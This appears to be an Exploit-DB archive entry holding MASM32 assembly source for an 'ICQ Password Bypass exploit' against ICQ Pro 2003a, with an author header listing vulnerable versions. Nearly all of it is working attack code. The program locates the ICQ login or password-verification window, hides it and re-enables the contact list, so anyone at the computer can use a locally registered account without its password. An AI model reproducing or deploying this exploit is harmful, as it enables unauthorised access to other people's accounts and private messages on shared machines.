https://www.exploit-db.com/exploits/52

漏洞细节尚未披露

; <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
;         CUT HERE - CUTE HERE - ca1-icq.asm - CUT HERE - CUT HERE      BOF 
; -------------------------------------------------------------------------
;
;  07/02/2003 - ca1-icq.asm 
;  ICQ Password Bypass exploit.
;  written by Caua Moura Prado (aka ca1)
; 
;  This exploit allows you to login to ICQ server using any account registered *locally*
;  no matter the 'save password' option is checked or not. High level security is also bypassed. 
;  All you have to do is run the exploit and set status property using your mouse when the flower
;  is yellow. If you accidentally set status to offline then you will need to restart ICQ and run 
;  the exploit again. 
;
;        uh-oh!
;         ___     
;      __/   __  
;     /  ___/          Vulnerable:
;     __/+ +__/          ICQ Pro 2003a Build #3800
;     /   ~~~   
;     __/   __/        Not Vulnerable:
;        ___/                ICQ Lite alpha Build 1211
;                               ICQ 2001b and ICQ 2002a 
;    tHe Flaw Power       All other versions were not tested.                       
;                                                      
                           coded with masm32
; ________________________________________________________________exploit born in .br
        
.386
.model flat, stdcall
option casemap:none
include masm32includeuser32.inc
include masm32includekernel32.inc
includelib masm32libuser32.lib
includelib masm32libkernel32.lib
.data
szTextHigh byte 'Password Verification', 0 
szTextLow byte 'Login to server', 0
szClassName byte '#32770', 0
.data?
hWndLogin dword ?
.code
_entrypoint:
 invoke FindWindow, addr szClassName, addr szTextHigh
 mov hWndLogin, eax  
 .if hWndLogin == 0
   invoke FindWindow, addr szClassName, addr szTextLow
   mov hWndLogin, eax
 .endif 
 invoke GetParent, hWndLogin 
 invoke EnableWindow, eax, 1      ;Enable ICQ contact 
list
 invoke ShowWindow, hWndLogin, 0  ;get rid of Login 
screen (don't kill this window)
 invoke ExitProcess, 0            ;uhuu.. cya! i gotta 
sleep!
end _entrypoint

; <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
;         CUT HERE - CUTE HERE - ca1-icq.asm - CUT HERE - CUT HERE      EOF 
; -------------------------------------------------------------------------



; milw0rm.com [2003-07-09]